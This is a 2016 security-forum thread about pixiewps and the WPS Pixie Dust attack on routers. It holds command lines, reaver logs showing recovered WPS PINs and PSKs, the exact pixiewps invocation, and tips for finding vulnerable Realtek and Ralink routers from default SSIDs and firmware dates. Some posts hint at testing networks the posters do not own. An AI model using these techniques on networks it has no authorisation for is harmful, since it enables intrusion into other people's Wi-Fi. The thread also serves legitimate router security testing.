Now a slightly problem. If you notice I wrote '--start 12/2015 --end 08/2012', instead of '--end 12/2015 --start 08/2012'. The first would be the correct way of doing things because of how I implemented things. The program executes the bruteforce backwards (yes I could've considered --start as the end and --end as start internally). Instead I've decided to make so that those two arguments can be swapped. So '--start 12/2015 --end 08/2012' and '--end 12/2015 --start 08/2012' are identical.

In any case, the program will always assign the 1st day for the month specified (or the 1st day of the 1st year if month is not specified). This means that if you use 12/2015, it will do the bruteforce (assuming going backwards) from the 1st of December 2015. If you want to bruteforce the month of december as well you will need to specify 2016 or 01/2016 (both equivalent).

Now that I think about it, maybe it's a bit counter-intuitive and misleading. I should probably change it so that the greater date would be done from the last day of the month. For example --start 12/2015 --end 01/1970 would be:

31/12/2015 to 01/01/1970

What do you think?

Also, for how I did things, the program will complain if you specify a date in the future say --start 2017. I don't remember if it was intentional or not. However if you specify only one date (or start or end, not both) the current machine time will be used for the other:

only --start 1970 will do from today (including seconds, minutes ...) to Epoch (0).
only --end 1970 will do from today (including seconds, minutes ...) to Epoch (0).

Because remeber you can swap them. See --help.

[!] Unknown extra argument(s)! means you put one or more extra (unknown) argument(s) somewhere, some example would be:

pixiewps ... -f 3 (-f doesn't accept arguments, yes I should've used -F, my bad)
pixiewps ... --start 08 2012 (extra space, 2012 is seen as an extra argument)
pixiewps ... random_string_that_doesnt_start_with_the_dash


Yes the latest versions on github are faster (maybe even 2x, 3x) than the ones packaged in Kali. The difference is made by some compiling optimization options I didn't add when I first released version 1.1.

Also now the choice of modes (auto, when --mode is not specified) is made by looking at the PKe (which is static for Realtek devices) and the nonce.

If you want to see what's going on under the hood compile using 'make debug', although it may break compatibility with Reaver, Bully or some 3rd party scripts so be aware.

kcdtv
2016-01-14, 18:06
Thanks for this very complete and detailed explanation :)


Now that I think about it, maybe it's a bit counter-intuitive and misleading. I should probably change it so that the greater date would be done from the last day of the month. For example --start 12/2015 --end 01/1970 would be:

31/12/2015 to 01/01/1970

What do you think?
Tricky question
My first idea when i hear "start in january 2015" would be that it means the first of january 2010 at 00:00 am
But if i consider that the brute force goes only backward, than it makes sense to think that start point is actually 31st of january 2015 at 23:59 :D
I guess that the most relevant system is the one that stick better to the program process , regardless to the representations that everyone have about what is a "start point".
So I think that this modification is a good idea.
We could do like that :

--start 01/2015 --end 01/2015
to brute force the month of January.
Which make sense and is straightforward
And if i put

--start 022015 --end 012015
I will naturally expect to brute force the month 01 and 02 by this command,
Not just one.



Yes the latest versions on github are faster (maybe even 2x, 3x) than the ones packaged in Kali. The difference is made by some compiling optimization options I didn't add when I first released version 1.1.

Okay :D
That what i noticed but the difference was so huge that i was not sure if i was not freaking out
with the "old" one I brute forced one year in about 6 minutes.
with the newest version it tok me a bit less than 3 minutes to make the full brute force untill 2012

Pixiewps 1.2

PRNG Seed: 1344584425 (Fri Aug 10 07:40:25 2012 UTC)
(...)
Time taken: 3 s 499 ms

3 time faster! :cool:

thanks again for this very nice improvement and for your answer.

mugiwara303
2016-01-19, 22:57
Thank you for this new release :D i have a question about the new --start 05/2015 --end 04/2015 argument i didn't understand it :confused: what is the purpose from it... and what about the -f argument is it replaced with -v?!

soxrok2212
2016-01-20, 00:48
i have a question about the new --start 05/2015 --end 04/2015 argument i didn't understand it
What don't you understand?


and what about the -f argument is it replaced with -v?!
https://github.com/wiire/pixiewps

mugiwara303
2016-01-20, 12:24
Sorry, my knowledge about this things is limited! I want to know how this date range works, is it necessary to get the pin or what LoL! I don't know what is the purpose from it, thank you

kcdtv
2016-01-20, 12:47
Everything is explained in the "bible" :D


In Realtek, the PRNG is a function that uses the time in seconds from January 1st, 1970 until whenever the data in generated (basically when the WPS exchange starts.) The vulnerable part is that the chip uses the same generator to make the Enrollee nonce as it does to make E-S1 and E-S2. So if the whole entire exchange occurs in that same second, E-S1 = E-S2 = Enrollee Nonce. If it occurs over the course of a few seconds, then all we have to do is find the seed that gave us the Enrolle Nonce, and then increment it and taking the output as E-S1 and E-S2. Its a multivariable brute force, so it may take a little bit more time but not more than a few minutes on a modern PC.

E-S1 = E-S2 = N1 Enrollee Nonce or generated with seed = time
WPS Pixie Dust Attack (Offline WPS Attack) (https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-%28Offline-WPS-Attack%29&highlight=pixiedust)

mugiwara303
2016-01-20, 20:19
thank you, i understand a bit now LoL! i still don't know how to use it and when but i will find out by trying it :D

kcdtv
2016-01-21, 00:07
I give you an example and switch on my routeur for testing.

CH 11 ][ Elapsed: 6 s ][ 2016-01-21 00:35

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH WPS ESSID MANUFACTURER

B8:55:10:02:F0:A1 -23 92 57 0 0 11 54e WPA2 CCMP PSK 1.0 DISP,PBC TOTOLINK N301RT Zioncom Electronics (Shenzhen) Ltd.

BSSID STATION PWR Rate Lost Frames Probe


root@pr0fesoraBubbleVanAppletrudell:/home/kcdtv# sudo airmon-ng stop wlan0mon

default SSID is in use (like 90% of the network i can reach from my room) and gives us the model...
quick check on the web and i learn that the device is kind of old, no new firmware for a long time and that it has a realtek chipset (i could see the realteck chipset in its probes but anyway reaver or bully will do it for me in full verbose mode )
As i rode the bible form soxrok2212 i know that realteck chipset can be "pixiedusted" so i launched reaver or bully to get the strings for pixiewps and execute pixewps
http://pix.toile-libre.org/upload/original/1453334051.png
Now, as i am a good hacker i checked a little on the web and saw that this router is from 2012, and as i am a master in "social engenering" :p i know that 79,67% of the people never ever update their firmware.
And i see in the download list that the original firmware is from august 2012.
So i decide to make a brute force on the month of august 2012 instead of brute forcing from today to 1970 (what wil do the option --force used alone )
http://pix.toile-libre.org/upload/original/1453334541.png
It would have taken me around 4 minutes or 5 if i had used the option -force without adding a start point and end point.
Cheers

soxrok2212
2016-01-21, 00:17
Good example kcdtv. Thanks :)

aanarchyy
2016-01-21, 00:41
That's a good little write-up kcdtv, very informative :-)

mugiwara303
2016-01-21, 11:18
thank you so much for you explanation kcdtv :o i got it now

kcdtv
2016-01-21, 13:54
I realize now that there is a little trick that can be used to identify vulnerable routers very fast.
It seems that the default ssid with this realteck SoC (RTL819X project) is.... the router model. :p
My totolink N301 RT has got for default ssid TOTOLINK N301RT
Than i checked the default ssid for another device that have the same SDK, the Prolink PRN3001A.
The default SSID also gives straightforward the model in this case :

http://pix.toile-libre.org/upload/original/1453381527.png

What about TrendNet TEW-638AP?
They have emulator online so that fast to check : http://pix.toile-libre.org/upload/original/1453382252.png

Conclusion : if you see the model name in the essid and that pixiewps suggest you to try again in brute force mode because it has a rtl819x you should use the options start and end focusing from end 2011 to end 2012/beginning 2013 when this kind of devices where launched.
I had a look to firmwares versions for this models and i didn't see any new firmware released after 2014 for this kind of devices.
So i am pretty sure that at least by adding --start 2014 you will find the PIN and gain some time as you won't brute force from 2016 to 2014.
This devices are not old but they are already at the end of their cicle of production since some years.
It means that manufacturer does not provide new version of firmware and the last "build time" that is used as a seed in DH exchange is the date of the version of one of he firmware available.

Other trick, if you see an image in one manual or checking with google, the layout for the web interface with this realtek SDK can give you a cue (if manufacturer didn't change it all)
An image is worth than explanation ...

https://www.wifi-libre.com/img/members/3/fuldisclose2.png
Do you have an impression of déjÃ*-vu? ;)

Necony286
2016-01-24, 13:08
Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.

i was not able to find the youtube video for the new reaver could u pls pm me the link i would appreciate it.

aanarchyy
2016-01-24, 14:55
i was not able to find the youtube video for the new reaver could u pls pm me the link i would appreciate it.

A) Can't post youtube links in this forum.
B) Can't PM in this forum.

soxrok2212
2016-01-24, 17:19
Any new video for this on youtube will feature the new reaver/bully. Just search it.

orangeworx
2016-01-26, 15:36
Very informative thread but I must say it's a little confusing to me as i'm relatively new to kali and i'm on a Nexus 7 2013 which doesn't really make things simple.
Kali does come with pixiewps and reaver but not the latest versions, nor the mod. I believe i effed something up while I was tryin to git clone both of these as I no longer have pixiewps (neither normally from bash or from the supposed install folder /usr/local/bin), wonder if this will require the whole flash stock/flash kali etc etc...
Also I'm running a TP-Link TL-WN722N and when I try to airmon-ng start wlan1mon ... the TP-Link flashes but nothing actually shows up, unlike in @kcdtv's post on the previous page. I can stop it fine and I can pick up networks when I run wifite

Any pointers? I know it sounds rather vague... I'm just looking for general to detailed resources/articles if you happen to know some or actually written some yourselves..
thanks

helen2016
2016-03-04, 20:37
Kali 2.0 Live with new Reaver and Pixie-Dust returns 2 solutions for same AP 1 minute later in every attempt.
Why would this happen ?

DATA:

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

xx:xx:xx:xx:xx:xx -75 399 0 0 11 54e WPA2 CCMP PSK yyy_zzzzzzzz_123456

BSSID STATION PWR Rate Lost Frames Probe


root@kali:~# reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzz_123456)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: ca:ac:0a:6f:4f:6b:f9:0c:d0:4a:82:2c:0c:47:f0:cc:cd :97:fb:5e:f0:3c:9c:bc:28:93:17:d8:ea:3b:19:c5:ef:9 0:9d:57:41:30:1f:03:5c:b7:4f:23:14:dc:39:2b:27:ea: 83:50:eb:56:90:43:bb:de:0e:e7:2d:49:47:89:88:ab:ea :c7:f1:bb:fc:7b:fd:21:aa:41:0a:08:8f:70:35:69:86:9 c:c4:48:f9:6f:a7:1f:2d:ce:b5:44:17:18:40:f9:22:f4: c1:e1:38:83:cd:3c:51:41:54:26:c4:36:2c:79:ce:ea:89 :67:ca:b8:44:99:e1:df:45:50:ef:a9:7a:3e:d7:90:e1:c f:af:f9:6b:82:4b:ad:61:f6:6d:63:ec:e1:cc:b6:dd:e0: 2e:5e:3b:f6:80:fc:26:e4:e2:d0:52:33:bf:fa:02:a8:27 :f1:82:b6:5a:4a:33:9d:a8:07:b9:f2:52:8f:ec:ab:52:a 5:b7:7d:3a:6a:1f:6b:30:2f
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: 91:b0:15:9d:19:e6:11:a1:a2:c1:b4:5a:b4:7d:53:14
[P] PKR: 34:ef:cc:3d:69:6c:68:22:35:b3:88:b0:2f:57:c1:c2:54 :fb:08:53:70:d9:2f:ed:a2:9d:f5:83:ce:12:7f:11:c4:3 f:42:61:9b:db:65:b7:b2:4e:8a:04:92:9d:fd:9b:02:ee: ed:8f:d9:c3:84:28:d3:ec:aa:a9:0a:8c:06:75:0b:97:6e :f3:5d:db:a2:28:32:84:c9:99:b8:3c:7a:c4:92:ff:03:3 7:13:6c:f5:0f:d4:30:0f:80:0a:45:0d:9a:10:b8:54:ee: b5:1b:83:47:91:2f:a9:7d:b7:a2:16:1e:95:06:01:00:f6 :1e:4e:1e:40:33:59:f9:0e:04:3c:35:0c:21:b8:e3:62:f e:81:14:7c:ad:c7:08:5e:62:9d:4a:a3:07:e6:69:1f:a7: bb:f4:f9:5f:ed:76:42:73:2e:a9:28:5f:41:64:89:61:ff :b0:18:f6:22:a9:8c:81:18:3c:07:e8:9a:65:a6:ac:9a:d 3:23:eb:10:62:a2:d4:27:98
[P] AuthKey: b4:06:48:58:73:26:c6:5d:dd:13:c7:56:ce:71:ff:ef:de :48:51:4e:78:57:29:25:7f:40:b0:42:19:94:19:8e
[P] E-Hash1: 77:a5:51:89:2c:1b:e3:ef:b0:f2:8d:04:80:e9:25:1f:28 :34:a1:a2:0b:3c:bd:8f:c0:22:d7:e4:1f:7f:5e:34
[P] E-Hash2: 30:75:c2:fe:29:c0:bc:6d:d4:1a:d1:54:15:21:33:ac:23 :44:f1:4e:3a:35:31:ce:0f:c7:10:58:fa:34:8c:aa
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880

[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '10427880'
[Reaver Test] [+] WPA PSK: 'dc7bc520883f02b6e784772ae7340cda5c85c8b2d9f389e55 5a014277034ec16'
[Reaver Test] [+] AP SSID: 'yyy_zzzzzzzz_123456'
root@kali:~#



NEXT 1 MINUTE LATER

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzzz_123456)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: 29:2a:f4:1a:a8:68:ea:00:7f:e4:e3:a2:56:30:9c:86:11 :75:8d:e8:cf:f0:d5:42:fb:f7:84:06:9b:00:9c:a2:63:4 7:e4:9f:05:d8:a7:c9:4f:b1:63:4c:69:6f:9d:38:18:b9: 2e:ee:4d:a6:74:ad:8a:d3:c9:05:a2:74:b5:e9:6b:7e:86 :10:0f:7c:28:54:cd:d8:3c:19:4a:2a:6c:f7:b3:ac:bd:6 6:09:c1:86:43:18:be:f0:cb:24:f9:1f:cc:7b:21:ef:97: 46:a3:50:77:83:5f:90:f0:81:5d:77:0a:cf:d4:ec:ee:97 :db:90:ce:36:a1:3c:1e:ac:63:31:f8:ec:ef:1a:d1:51:1 a:9f:c8:4b:2f:fe:8f:f9:c2:23:6c:f3:e6:27:2e:a2:d4: 0d:fa:f3:cd:fe:4a:85:0b:89:86:1f:cd:20:1c:a1:90:cc :44:a4:d7:00:81:75:51:1c:9c:e1:f6:14:b5:cc:d9:11:e 9:fd:80:bc:86:cb:61:52:de
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: 9f:8c:14:96:8c:11:b1:23:ad:c1:6b:8a:04:1a:e5:7c
[P] PKR: af:1b:86:49:f5:32:dc:9f:6b:77:fd:b8:70:3f:02:27:0e :80:ce:f4:f3:29:8c:85:6e:d1:87:21:ad:7a:27:37:b0:4 f:b7:27:36:bb:dc:0c:08:94:40:c6:56:0c:3b:91:41:71: bd:d2:74:3f:ea:39:cc:33:f4:be:c3:22:19:6d:b7:f5:ae :8b:16:ae:a0:0c:33:c3:a5:39:85:34:42:af:db:2d:00:5 8:09:01:53:bf:c5:f8:db:57:89:d3:73:eb:db:f6:06:3d: 0a:95:0a:a0:d2:08:ab:8c:2c:16:77:26:8d:9a:6f:0f:03 :9a:aa:2b:69:10:8e:e1:38:09:8f:05:6a:2a:f4:a6:ed:a 8:d7:c6:9d:f1:6b:b5:bf:ed:47:9d:4d:67:35:9d:a9:93: aa:e9:83:fc:30:93:8c:17:1c:4d:27:6f:00:b5:ad:09:3c :e7:76:38:9c:d3:b2:d3:37:bb:1a:00:4a:8b:e0:d5:79:e 2:86:c4:a6:7b:21:94:1e:ba
[P] AuthKey: ff:91:1a:65:26:a1:81:a4:2b:d3:f5:39:2d:e7:b8:5d:09 :29:56:fd:3f:7b:ca:01:ac:60:fc:66:5a:3a:2b:93
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: 49:da:96:93:49:b0:a9:71:4a:82:5c:9b:9a:e3:cc:39:04 :f1:9c:08:9e:2c:de:a1:e5:1e:c6:79:6b:2c:84:88:b7:4 f:0c:c8:6a:b5:07:7b:2c:d6:1b:5b:f7:66:be:90:53:3b: ea:b2:a6:95:5a:26:d6:81:ee:92:dd:5c:e6:da:c4:55:c9 :9b:88:9f:27:16:a6:d8:8d:35:7c:46:45:14:65:21:94:2 f:c8:44:5a:47:31:12:60:9b:53:54:df:ae:b8:36:4a:44: 39:74:6e:18:6c:32:e1:f7:ab:e8:c8:46:d2:67:41:2d:2f :e1:77:a5:ea:4e:63:2e:54:ba:41:c6:58:f3:4c:df:9c:c c:9c:0f:a8:48:17:be:e7:a3:b4:2a:e7:a4:d9:0a:3a:b6: f6:f5:04:0b:b1:f6:e5:d9:5a:88:c8:7e:da:0a:90:d1:08 :74:61:47:23:b1:05:b2:e6:83:76:07:fe:06:38:5c:c9:1 b:21:ee:1a:fd:88:28:ea:41
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: b9:a2:80:a8:97:75:b9:10:c4:1a:fe:d2:f9:97:59:0a
[P] PKR: e9:10:a8:1a:a5:cd:21:9a:67:93:0d:ee:2a:a8:30:87:6f :80:e8:32:b3:62:c4:cb:a3:2d:72:fc:66:ab:93:ea:24:b c:d0:b1:29:1c:b6:cb:fa:dc:76:ab:77:99:9d:ae:da:91: 02:d6:de:fe:e6:1a:86:c4:dc:c9:31:3d:08:07:5f:07:84 :41:77:15:2f:74:75:fb:62:46:e8:c8:94:c4:28:c1:63:a 3:07:2b:46:30:1e:11:e2:c2:c0:4d:61:ca:32:7d:23:6f: 88:07:aa:da:95:29:77:6d:7d:28:da:56:0d:a6:fa:57:81 :7f:cb:df:bf:8c:07:bd:74:88:f5:16:51:48:08:83:ab:5 f:71:8c:c4:53:dc:b0:36:85:ab:ea:1b:97:0d:a8:38:50: 55:7f:89:73:23:e1:0f:d7:ba:ad:0c:8e:77:3e:ab:1f:c0 :73:9e:d1:5e:57:46:52:61:f2:6c:f6:e2:44:2d:ec:2c:b 3:6a:d4:84:c1:67:b3:a5:ea
[P] AuthKey: e4:a5:f2:82:31:25:aa:e0:5b:cb:7b:09:4e:91:b7:46:28 :95:8a:ae:d7:55:4a:52:87:38:87:d0:d4:f0:6d:0d
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: 2b:d9:be:8f:b9:9f:53:4f:30:2e:e7:b0:e0:e8:0f:21:3b :94:44:73:c4:70:ed:d0:24:45:57:e9:74:10:38:63:10:7 e:26:7d:57:3b:38:3d:f7:e1:c6:40:09:a4:cd:c1:46:5d: e1:60:97:aa:ca:a1:24:c6:ca:fa:38:5a:9c:56:65:18:2e :14:35:11:26:17:0a:d9:40:04:7b:99:dc:0f:90:5d:63:4 d:09:4c:85:19:8c:9e:19:a8:48:85:97:7f:ae:7c:a0:29: fa:12:d2:fb:0c:b3:30:2d:46:61:fa:2d:d9:5f:9d:ee:9d :6e:1d:b6:1d:08:4c:64:f7:1f:3a:b7:cb:54:f4:03:b0:6 0:94:c2:cb:b4:e5:d7:2f:71:1b:ae:57:c8:60:c5:dd:a1: c9:82:31:81:70:af:45:97:67:21:d3:d2:4f:1e:f2:81:48 :14:8d:67:be:58:f7:3d:ff:ed:e2:fc:50:8a:f7:ef:e1:0 0:9a:9a:9b:0e:b6:a4:f5:80
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: 47:b8:f7:80:fc:31:5b:a7:c7:58:6f:40:30:68:a9:04
[P] PKR: 4b:85:25:b3:7e:61:dc:a6:c6:d3:c2:45:5d:90:3a:cb:b0 :53:37:94:02:dd:29:17:68:04:1d:3b:3a:6a:1a:40:ca:c 1:8b:22:e8:4b:ae:f6:08:d8:a7:a3:6c:1b:29:ea:ec:95: 1d:ed:19:56:89:15:f0:0f:8f:74:73:dd:ba:27:0b:ea:0b :bd:54:36:24:57:40:25:be:15:e1:a8:9a:24:d8:10:04:2 5:66:f3:01:f7:b1:84:51:b3:7d:cc:a7:3c:e4:c8:4c:d9: 4e:52:77:2c:61:3a:d0:ed:dc:b3:e0:31:17:77:5e:e7:9c :51:9a:93:e2:09:bc:cf:f1:d2:d6:91:5c:e0:07:ec:34:1 b:77:89:47:ec:f2:65:88:97:65:de:74:2f:0b:69:6b:44: 20:f9:d1:b3:ab:07:c9:e7:4d:e0:21:a2:01:b9:1a:33:e9 :b6:5b:78:ee:b4:46:62:7c:70:06:d0:43:57:d1:04:76:d 9:e6:64:1b:d6:50:3a:27:31
[P] AuthKey: 5f:c8:ce:60:82:fe:54:52:5d:d3:88:0a:5f:45:68:77:78 :60:23:1d:f6:59:82:74:61:cd:bc:0f:96:e9:36:7a
[P] E-Hash1: 5e:6f:2d:98:5c:81:ab:8e:46:21:76:99:b0:be:81:98:0f :25:88:ae:ee:c0:24:67:49:23:c4:4d:01:f7:d2:a7
[P] E-Hash2: a3:1a:25:b2:34:75:46:b4:3a:a8:df:12:7e:01:44:e5:d3 :6e:66:1e:73:81:bd:4a:5e:f4:2d:fe:46:12:19:80
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880

[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '10427880'
[Reaver Test] [+] WPA PSK: 'd717380be0f1784ca16d3fc559d1a62a5e53a549cc061eb98 e708c2019e01ca0'
[Reaver Test] [+] AP SSID: 'yyy_zzzzzzzzz_123456'
root@kali:~#

soxrok2212
2016-03-04, 21:20
Pretty sure it is a hash of the actual password. Try with Bully: https://github.com/aanarchyy/bully

shrinivas murthi
2016-03-05, 07:52
can any one explain -f option in pixie wps and details about PRNG ... steps involved in PRNG attack including command .. also inform whether linksys E 900 is vulnerable to attack ??

Ramzes
2016-03-05, 19:39
can any one explain -f option in pixie wps and details about PRNG ... steps involved in PRNG attack including command .. also inform whether linksys E 900 is vulnerable to attack ??
Write in terminal pixiewps -e PKE -r PKR -s e-hash1 -z e-hash2 -a authkey -n e-nonce -f
PKE/PKR/E-HASH1+2/Authkey and e-nonce are written in your reaver attack on specified BSSID

helen2016
2016-03-07, 00:45
I dunno
Same result with bully and 7 of 8 of the pin numbers.
This is not a crisis.
I thought there may be some magic code in the AP or filter when another mac associated with it.
It looked like a randomly generated 64 bit hex password.
Thanks for the reply
If youl like, I can post the Bully log data.

Let me clarify my two posts using Reaver and Bully.
I am unable to connect to this AP with the first password solution.
So, I used Reaver with Pixiedust 1 minute apart to glean information.
There is no connect when I turn around and use my other desktop with the copied PSK on a USB.
I provided the log to show the changing (the 64 hex number) answers.
The pin number is always the same.
Reaver has worked in about 5 cases and I can connect with those routers.
There has been about 30 cases when the pin is not found or the association fails.
I may have wrongly posted the Reaver log in a different thread.
I don't think posting the Bully log will provide more helpful information.

Laserman75
2016-03-07, 10:10
If youl like, I can post the Bully log data .

Yes, please ;)

kcdtv
2016-03-07, 11:17
It looked like a randomly generated 64 bit hex password.
That's the PMK :)

aanarchyy
2016-03-07, 23:04
Yeah, you can use the 64 bit password hash just fine.

helen2016
2016-03-14, 13:19
Reply to "Try with Bully" probably posted in wrong thread.
The results were the same, changing PSK and no connect.
The pin number is always the same.
My last attempt was copy and transfer the 64 PSK from laptop to desktop using TMAC V6 to spoof the client MAC obtained from airodump-ng.
Still unable to connect, but I can see the process starting and failing.
My wireless knowledge and coding ability combined with stumbling terminal syntex is far too low to go any further.
Thanks for the relies and comments.

soxrok2212
2016-03-14, 14:01
Hm, my last consideration would either be that your wireless card is bad(which I doubt since it seems to handle reaver and bully ok up to the point of receiving the PSK) or the router does not have WPS configured (or in any event, configured properly).

alkesh
2016-03-14, 19:30
First of all thanks to all the developers who have worked on this project.
Now to help helen2016 about psk.
You will need an android device.
P.s. Rooted device will be better.
Go to wifi settings.
Tap on essid. You will see a pop up to enter password. Tick advanced option. You will see Wps and dropdown box saying off. Tap on it and select pin from access point enter your Wps pin.
In less than two minutes you will be connected if Wps pin is correct and Wps is active on AP.
Now u can navigate to /data/misc/wifi/
Open wpa_supplicant.conf as text
And you can see acquired password.
Give it a try

kcdtv
2016-03-14, 22:03
@ alkesh
You do not need and android device ;) : any GNU-Linux distribution (kali itslef) can connect with a WPS PIN using wpa_cli from wpa_supplicant
@ Helen
You can connect with the PMK entered directly, at least with a GNU-Linux distribution (i don't know or use windows) .
Don't forget to remove the "two points"...
The passphrase is not used directly in WPA protocol, it is just for human, what is used is the PMK that you can calculate like this :

PMK = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256)

A string is created wiith the passphrase and ssid lenght, it is then passed 4096 times through SHA-1 hash function and you keep the 256 first bytes (64 hex characters) to get your PMK
It looks like a classical distance issue
Get closer to your router
And this "problem" doesn't have to do with pixiewps as the PIN is generated.
You can check the PIN on the sticker under your router
cheers

soxrok2212
2016-03-14, 22:32
kcdtv is right, you don't need an Android. Any linux distribution should do.

whitetsagan
2016-04-12, 15:30
Hi,

Please, I'm trying to test Ralink RT2860 but it constanly gives me a error "wps transaction failed (0x04)" and I can't get m3 or m4 messages.

How can I get e-hashes out of this?

whitetsagan
2016-04-12, 15:32
Finally able to create my account in this forum

I already emailed the wiire on the tests I've done.

First of all I made a modified version of reaver to facilitate the tests, this modification is already do a pixie test when a pin is tested on reaver

[P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
[P] PKE: 6b: 0e: 22: cb: cd: 21: ........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received message M1
[P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
[+] Sending message M2
[P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
[P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
[Pixie-Dust]
[Pixie-Dust] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie-Dust] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
[Pixie Dust-] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
[Pixie-Dust] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
[Pixie-Dust] [+] WPS pin: 41368541
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
[+] Received message M3
[+] Sending message M4

If someone want this version, tell me



Now with relation to the TP-Link.

I believe it may be vulnerable to another type of problem.

I have a TP-Link 740N v1, is a very old router, think it 2004-2005


It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.

But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

The seed for generating the random number is based on the date (date, time, seconds) router

Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

But this problem certainly is present in many other models of routers.


Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.

I will continue to develop and when I have more news come back to post.

Sorry for the English, I used a translator

Hello,

I'm trying to test Ralink RT2860 (exactly same as the example above) but it constantly gives me an error "WPS transaction failed (0x04)" and I can't get any m3, m4 messages or e-hashes. Please, any solutions?

bob79
2016-04-13, 09:02
it may be the distance, obstacles, many factors. what airodump shows on the pwr and rqx of that ap?

whitetsagan
2016-04-13, 11:47
The power is between -65 to -70. I also tried to test one by sitting just right next to it. I don't think it has anything with obstacle and stuff. Router is from Huawei. And reaver says:

[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860

Wash indicates that WPS is not locked. Super confused. Please, help?

whitetsagan
2016-04-24, 11:49
Please, anyone?

dorhug
2016-04-24, 14:07
It does nothing but keeps authenticating for hours. The authentication process is always successful but at the end it creates another authentication process and so on.

Did anyone has that kind of problem with pixiewps?

soxrok2212
2016-04-24, 15:12
Maybe WPS is enabled but not configured.

whitetsagan
2016-04-24, 16:35
Maybe WPS is enabled but not configured.

Does that mean it is a no go?

bob79
2016-04-24, 19:57
post what "airodump-ng wlan0mon --wps" gives. as soxrox said, it may not be configured

whitetsagan
2016-04-25, 16:14
post what "airodump-ng wlan0mon --wps" gives. as soxrox said, it may not be configured

Thanks. .

kcdtv
2016-04-28, 19:56
you should edit your pictures ;) (it doesn't look like you are testing your network :p )
anyway your problem is not a pixiewps issues : getting the hashes is one thing handled by others programs (and you can do it yourself by having a look to your capture file) pixiewps is "just" about using this hashes to get the PIN.

